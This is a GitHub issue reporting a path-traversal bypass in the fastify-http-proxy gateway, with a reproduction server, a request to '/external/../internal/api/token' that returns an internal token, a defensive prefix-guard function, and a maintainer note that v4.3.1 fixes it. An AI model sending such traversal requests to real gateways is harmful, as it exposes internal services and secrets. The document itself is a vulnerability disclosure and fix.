fastify/fastify-http-proxy

API whitelisting behind gateway

artur-ma opened this issue · 2 comments

This is not a real security breach I guess, but some companies rely on api-gateways to whitelist their APIs that are exposed to the world.

For example, I would like to expose only those APIs that have the /external prefix:

```js
'use strict'

const Fastify = require('fastify')

// "target" stands in for the internal service; "server" is the gateway.
const target = Fastify({
  logger: false
})

const server = Fastify({
  logger: false
})

// An internal route that must never be reachable through the gateway.
target.get('/internal/api/token', (request, reply) => {
  reply.send('Security token: 123')
})

// The only route that is meant to be exposed.
target.get('/external/api/v1', (request, reply) => {
  reply.send('hello world')
})

const proxy = require('fastify-http-proxy')

// Only requests under /external should be forwarded to the upstream.
server.register(proxy, {
  upstream: 'http://localhost:3001',
  prefix: '/external',
  rewritePrefix: '/external',
})

target.listen(3001, (err) => {
  if (err) {
    throw err
  }

  server.listen(3000, (err) => {
    if (err) {
      throw err
    }
  })
})
```

Then execute this snippet (does not work with cURL for some reason):

URL: http://127.0.0.1:3000/external/../internal/api/token

```js
var request = require('request');
// Request goes to the gateway on port 3000 with a ".." segment after the allowed prefix.
request.get('http://127.0.0.1:3000/external/../internal/api/token', function (error, response) {
  if (error) throw new Error(error);
  console.log(response.body);
});
```

will result in:

```
$ node req.js 
Security token: 123
```
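A gateway-side guard for the bypass shown above, as an added example that is not part of fastify-http-proxy or of the maintainers' fix: it resolves `.` and `..` segments (including percent-encoded forms) before comparing the path against the allowed prefix, so the check sees the same path the upstream would route on. The Fastify hook signature `(request, reply, done)` and the use of `request.raw.url` are assumptions taken from the Fastify hook API.

```javascript
// Added example, not part of fastify-http-proxy: resolve dot segments before
// the prefix comparison so "/external/../internal" is judged as "/internal".

// Returns the path the upstream would route on after "." and ".." segments
// (including "%2e%2e") are resolved, or null when a segment decodes to
// something containing a separator, which we reject rather than guess how
// the upstream would interpret it.
function normalizePath(rawUrl) {
  const path = rawUrl.split(/[?#]/, 1)[0]
  if (!path.startsWith('/')) return null // only origin-form request targets
  const out = []
  for (const seg of path.split('/').slice(1)) {
    let decoded = seg
    try { decoded = decodeURIComponent(seg) } catch (e) { /* malformed escape: keep raw */ }
    if (decoded.includes('/') || decoded.includes('\\')) return null
    if (decoded === '' || decoded === '.') continue
    if (decoded === '..') { out.pop(); continue }
    out.push(seg)
  }
  return '/' + out.join('/')
}

// True only if the normalized path is the prefix itself or lies beneath it
// ("/externalfoo" must not match "/external").
function isInsidePrefix(rawUrl, prefix) {
  const p = normalizePath(rawUrl)
  if (p === null) return false
  return p === prefix || p.startsWith(prefix + '/')
}

// Factory for a Fastify onRequest hook (signature assumed from the Fastify
// docs); register it on the gateway before the proxy plugin.
function makePrefixGuard(prefix) {
  return function prefixGuard(request, reply, done) {
    const rawUrl = (request.raw && request.raw.url) || request.url
    if (!isInsidePrefix(rawUrl, prefix)) {
      reply.code(403).send({ error: 'path escapes ' + prefix })
      return // response already sent, so done() is not called
    }
    done()
  }
}
```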

We are working on this and a fix will be published soon.

This was fixed in v4.3.1.